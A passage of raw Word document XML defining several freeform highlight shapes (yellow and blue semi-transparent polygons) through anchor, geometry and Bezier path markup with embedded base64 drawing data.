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&#10;" path="m7121,22486c-11617,32480,12281,57440,14616,74951,17278,94917,17891,115217,22111,134912,25422,150362,22111,174885,37101,179882,105584,202709,81554,198739,179508,202367,281901,206160,384373,207364,486806,209863,562361,206085,636824,204850,711659,194872,724286,193188,736642,189875,749134,187377,746636,179882,742683,172723,741639,164892,729294,72305,742808,101528,726649,44971,723472,33852,718879,11910,704164,7495,684871,1707,664190,2498,644203,0l291934,7495c236936,9089,181949,11447,127042,14990,-23353,24693,25859,12492,7121,22486xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7121,22486;14616,74951;22111,134912;37101,179882;179508,202367;486806,209863;711659,194872;749134,187377;741639,164892;726649,44971;704164,7495;644203,0;291934,7495;127042,14990;7121,22486" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D5424">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251768832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5C4BD08F" wp14:editId="5DF40AF5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>628623</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3284813</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1492100" cy="307299"/>
                <wp:effectExtent l="0" t="0" r="57785" b="23495"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21466"/>
                    <wp:lineTo x="22069" y="21466"/>
                    <wp:lineTo x="22069" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="24" name="Freeform 24"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1492100" cy="307299"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 579 w 1492100"/>
                            <a:gd name="connsiteY0" fmla="*/ 22486 h 307299"/>
                            <a:gd name="connsiteX1" fmla="*/ 53044 w 1492100"/>
                            <a:gd name="connsiteY1" fmla="*/ 22486 h 307299"/>
                            <a:gd name="connsiteX2" fmla="*/ 510244 w 1492100"/>
                            <a:gd name="connsiteY2" fmla="*/ 14991 h 307299"/>
                            <a:gd name="connsiteX3" fmla="*/ 757582 w 1492100"/>
                            <a:gd name="connsiteY3" fmla="*/ 0 h 307299"/>
                            <a:gd name="connsiteX4" fmla="*/ 1447130 w 1492100"/>
                            <a:gd name="connsiteY4" fmla="*/ 7495 h 307299"/>
                            <a:gd name="connsiteX5" fmla="*/ 1477110 w 1492100"/>
                            <a:gd name="connsiteY5" fmla="*/ 67456 h 307299"/>
                            <a:gd name="connsiteX6" fmla="*/ 1484605 w 1492100"/>
                            <a:gd name="connsiteY6" fmla="*/ 89941 h 307299"/>
                            <a:gd name="connsiteX7" fmla="*/ 1492100 w 1492100"/>
                            <a:gd name="connsiteY7" fmla="*/ 112427 h 307299"/>
                            <a:gd name="connsiteX8" fmla="*/ 1484605 w 1492100"/>
                            <a:gd name="connsiteY8" fmla="*/ 172387 h 307299"/>
                            <a:gd name="connsiteX9" fmla="*/ 1477110 w 1492100"/>
                            <a:gd name="connsiteY9" fmla="*/ 217358 h 307299"/>
                            <a:gd name="connsiteX10" fmla="*/ 1462120 w 1492100"/>
                            <a:gd name="connsiteY10" fmla="*/ 277318 h 307299"/>
                            <a:gd name="connsiteX11" fmla="*/ 1447130 w 1492100"/>
                            <a:gd name="connsiteY11" fmla="*/ 292309 h 307299"/>
                            <a:gd name="connsiteX12" fmla="*/ 1177307 w 1492100"/>
                            <a:gd name="connsiteY12" fmla="*/ 299804 h 307299"/>
                            <a:gd name="connsiteX13" fmla="*/ 937464 w 1492100"/>
                            <a:gd name="connsiteY13" fmla="*/ 307299 h 307299"/>
                            <a:gd name="connsiteX14" fmla="*/ 157975 w 1492100"/>
                            <a:gd name="connsiteY14" fmla="*/ 292309 h 307299"/>
                            <a:gd name="connsiteX15" fmla="*/ 105510 w 1492100"/>
                            <a:gd name="connsiteY15" fmla="*/ 284813 h 307299"/>
                            <a:gd name="connsiteX16" fmla="*/ 45549 w 1492100"/>
                            <a:gd name="connsiteY16" fmla="*/ 277318 h 307299"/>
                            <a:gd name="connsiteX17" fmla="*/ 23064 w 1492100"/>
                            <a:gd name="connsiteY17" fmla="*/ 262328 h 307299"/>
                            <a:gd name="connsiteX18" fmla="*/ 8074 w 1492100"/>
                            <a:gd name="connsiteY18" fmla="*/ 217358 h 307299"/>
                            <a:gd name="connsiteX19" fmla="*/ 15569 w 1492100"/>
                            <a:gd name="connsiteY19" fmla="*/ 112427 h 307299"/>
                            <a:gd name="connsiteX20" fmla="*/ 23064 w 1492100"/>
                            <a:gd name="connsiteY20" fmla="*/ 89941 h 307299"/>
                            <a:gd name="connsiteX21" fmla="*/ 579 w 1492100"/>
                            <a:gd name="connsiteY21" fmla="*/ 22486 h 3072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92100" h="307299">
                              <a:moveTo>
                                <a:pt x="579" y="22486"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="5576" y="11244"/>
                                <a:pt x="-13860" y="24577"/>
                                <a:pt x="53044" y="22486"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="205390" y="17725"/>
                                <a:pt x="357844" y="17489"/>
                                <a:pt x="510244" y="14991"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="580363" y="9597"/>
                                <a:pt x="693713" y="0"/>
                                <a:pt x="757582" y="0"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="987445" y="0"/>
                                <a:pt x="1217281" y="4997"/>
                                <a:pt x="1447130" y="7495"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1473293" y="33659"/>
                                <a:pt x="1459885" y="15782"/>
                                <a:pt x="1477110" y="67456"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="1484605" y="89941"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1492100" y="112427"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="1489602" y="132414"/>
                                <a:pt x="1487454" y="152447"/>
                                <a:pt x="1484605" y="172387"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1482456" y="187431"/>
                                <a:pt x="1480294" y="202498"/>
                                <a:pt x="1477110" y="217358"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1472793" y="237502"/>
                                <a:pt x="1476687" y="262750"/>
                                <a:pt x="1462120" y="277318"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1457123" y="282315"/>
                                <a:pt x="1454175" y="291753"/>
                                <a:pt x="1447130" y="292309"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1357433" y="299391"/>
                                <a:pt x="1267244" y="297159"/>
                                <a:pt x="1177307" y="299804"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="937464" y="307299"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="829208" y="305911"/>
                                <a:pt x="367019" y="304979"/>
                                <a:pt x="157975" y="292309"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="140341" y="291240"/>
                                <a:pt x="123021" y="287148"/>
                                <a:pt x="105510" y="284813"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="45549" y="277318"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="38054" y="272321"/>
                                <a:pt x="27838" y="269967"/>
                                <a:pt x="23064" y="262328"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="14690" y="248929"/>
                                <a:pt x="8074" y="217358"/>
                                <a:pt x="8074" y="217358"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="10572" y="182381"/>
                                <a:pt x="11472" y="147253"/>
                                <a:pt x="15569" y="112427"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="16492" y="104580"/>
                                <a:pt x="22084" y="97781"/>
                                <a:pt x="23064" y="89941"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="24613" y="77546"/>
                                <a:pt x="-4418" y="33728"/>
                                <a:pt x="579" y="22486"/>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755D31" id="Freeform 463" o:spid="_x0000_s1026" style="position:absolute;margin-left:49.5pt;margin-top:258.65pt;width:117.5pt;height:24.2pt;z-index:251768832;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" coordsize="1492100,30729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&#10;AAQABADzAAAA0woAAAAA&#10;" path="m579,22486c5576,11244,-13860,24577,53044,22486,205390,17725,357844,17489,510244,14991,580363,9597,693713,,757582,,987445,,1217281,4997,1447130,7495,1473293,33659,1459885,15782,1477110,67456l1484605,89941,1492100,112427c1489602,132414,1487454,152447,1484605,172387,1482456,187431,1480294,202498,1477110,217358,1472793,237502,1476687,262750,1462120,277318,1457123,282315,1454175,291753,1447130,292309,1357433,299391,1267244,297159,1177307,299804l937464,307299c829208,305911,367019,304979,157975,292309,140341,291240,123021,287148,105510,284813l45549,277318c38054,272321,27838,269967,23064,262328,14690,248929,8074,217358,8074,217358,10572,182381,11472,147253,15569,112427,16492,104580,22084,97781,23064,89941,24613,77546,-4418,33728,579,22486xe" fillcolor="#ffc000 [3207]" strokecolor="#7f5f00 [1607]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="579,22486;53044,22486;510244,14991;757582,0;1447130,7495;1477110,67456;1484605,89941;1492100,112427;1484605,172387;1477110,217358;1462120,277318;1447130,292309;1177307,299804;937464,307299;157975,292309;105510,284813;45549,277318;23064,262328;8074,217358;15569,112427;23064,89941;579,22486" o:connectangles="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7808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63D2F373" wp14:editId="290AC0BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>988920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2213017</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1783875" cy="314793"/>
                <wp:effectExtent l="0" t="0" r="45085" b="15875"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="9843" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="20945"/>
                    <wp:lineTo x="1230" y="20945"/>
                    <wp:lineTo x="14456" y="20945"/>
                    <wp:lineTo x="21531" y="20945"/>
                    <wp:lineTo x="21838" y="19200"/>
                    <wp:lineTo x="21838" y="0"/>
                    <wp:lineTo x="9843" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="27" name="Freeform 27"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1783875" cy="314793"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 46 w 1783875"/>
                            <a:gd name="connsiteY0" fmla="*/ 52465 h 314793"/>
                            <a:gd name="connsiteX1" fmla="*/ 30026 w 1783875"/>
                            <a:gd name="connsiteY1" fmla="*/ 59960 h 314793"/>
                            <a:gd name="connsiteX2" fmla="*/ 374800 w 1783875"/>
                            <a:gd name="connsiteY2" fmla="*/ 44970 h 314793"/>
                            <a:gd name="connsiteX3" fmla="*/ 674603 w 1783875"/>
                            <a:gd name="connsiteY3" fmla="*/ 37475 h 314793"/>
                            <a:gd name="connsiteX4" fmla="*/ 764544 w 1783875"/>
                            <a:gd name="connsiteY4" fmla="*/ 29980 h 314793"/>
                            <a:gd name="connsiteX5" fmla="*/ 1079337 w 1783875"/>
                            <a:gd name="connsiteY5" fmla="*/ 14990 h 314793"/>
                            <a:gd name="connsiteX6" fmla="*/ 1266715 w 1783875"/>
                            <a:gd name="connsiteY6" fmla="*/ 0 h 314793"/>
                            <a:gd name="connsiteX7" fmla="*/ 1738905 w 1783875"/>
                            <a:gd name="connsiteY7" fmla="*/ 14990 h 314793"/>
                            <a:gd name="connsiteX8" fmla="*/ 1761390 w 1783875"/>
                            <a:gd name="connsiteY8" fmla="*/ 22485 h 314793"/>
                            <a:gd name="connsiteX9" fmla="*/ 1783875 w 1783875"/>
                            <a:gd name="connsiteY9" fmla="*/ 202367 h 314793"/>
                            <a:gd name="connsiteX10" fmla="*/ 1776380 w 1783875"/>
                            <a:gd name="connsiteY10" fmla="*/ 262328 h 314793"/>
                            <a:gd name="connsiteX11" fmla="*/ 1753895 w 1783875"/>
                            <a:gd name="connsiteY11" fmla="*/ 269823 h 314793"/>
                            <a:gd name="connsiteX12" fmla="*/ 1544033 w 1783875"/>
                            <a:gd name="connsiteY12" fmla="*/ 262328 h 314793"/>
                            <a:gd name="connsiteX13" fmla="*/ 1409121 w 1783875"/>
                            <a:gd name="connsiteY13" fmla="*/ 269823 h 314793"/>
                            <a:gd name="connsiteX14" fmla="*/ 1221744 w 1783875"/>
                            <a:gd name="connsiteY14" fmla="*/ 284813 h 314793"/>
                            <a:gd name="connsiteX15" fmla="*/ 974406 w 1783875"/>
                            <a:gd name="connsiteY15" fmla="*/ 299803 h 314793"/>
                            <a:gd name="connsiteX16" fmla="*/ 884465 w 1783875"/>
                            <a:gd name="connsiteY16" fmla="*/ 307298 h 314793"/>
                            <a:gd name="connsiteX17" fmla="*/ 599652 w 1783875"/>
                            <a:gd name="connsiteY17" fmla="*/ 314793 h 314793"/>
                            <a:gd name="connsiteX18" fmla="*/ 277364 w 1783875"/>
                            <a:gd name="connsiteY18" fmla="*/ 307298 h 314793"/>
                            <a:gd name="connsiteX19" fmla="*/ 97482 w 1783875"/>
                            <a:gd name="connsiteY19" fmla="*/ 284813 h 314793"/>
                            <a:gd name="connsiteX20" fmla="*/ 22531 w 1783875"/>
                            <a:gd name="connsiteY20" fmla="*/ 277318 h 314793"/>
                            <a:gd name="connsiteX21" fmla="*/ 22531 w 1783875"/>
                            <a:gd name="connsiteY21" fmla="*/ 134911 h 314793"/>
                            <a:gd name="connsiteX22" fmla="*/ 46 w 1783875"/>
                            <a:gd name="connsiteY22" fmla="*/ 52465 h 3147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1783875" h="314793">
                              <a:moveTo>
                                <a:pt x="46" y="52465"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="1295" y="39973"/>
                                <a:pt x="19727" y="60166"/>
                                <a:pt x="30026" y="59960"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="145036" y="57660"/>
                                <a:pt x="259803" y="47845"/>
                                <a:pt x="374800" y="44970"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="674603" y="37475"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="704583" y="34977"/>
                                <a:pt x="734506" y="31649"/>
                                <a:pt x="764544" y="29980"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="869432" y="24153"/>
                                <a:pt x="974622" y="23367"/>
                                <a:pt x="1079337" y="14990"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="1266715" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="1284135" y="348"/>
                                <a:pt x="1618548" y="-55"/>
                                <a:pt x="1738905" y="14990"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1746744" y="15970"/>
                                <a:pt x="1753895" y="19987"/>
                                <a:pt x="1761390" y="22485"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1790623" y="110184"/>
                                <a:pt x="1775504" y="51678"/>
                                <a:pt x="1783875" y="202367"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1781377" y="222354"/>
                                <a:pt x="1784561" y="243921"/>
                                <a:pt x="1776380" y="262328"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1773171" y="269548"/>
                                <a:pt x="1761795" y="269823"/>
                                <a:pt x="1753895" y="269823"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1683896" y="269823"/>
                                <a:pt x="1613987" y="264826"/>
                                <a:pt x="1544033" y="262328"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="1409121" y="269823"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="1346614" y="274184"/>
                                <a:pt x="1284288" y="281023"/>
                                <a:pt x="1221744" y="284813"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1139298" y="289810"/>
                                <a:pt x="1056718" y="292944"/>
                                <a:pt x="974406" y="299803"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="944426" y="302301"/>
                                <a:pt x="914525" y="306096"/>
                                <a:pt x="884465" y="307298"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="789570" y="311094"/>
                                <a:pt x="694590" y="312295"/>
                                <a:pt x="599652" y="314793"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="277364" y="307298"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="121839" y="301643"/>
                                <a:pt x="252756" y="300340"/>
                                <a:pt x="97482" y="284813"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="22531" y="277318"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="1993" y="215701"/>
                                <a:pt x="16460" y="268469"/>
                                <a:pt x="22531" y="134911"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
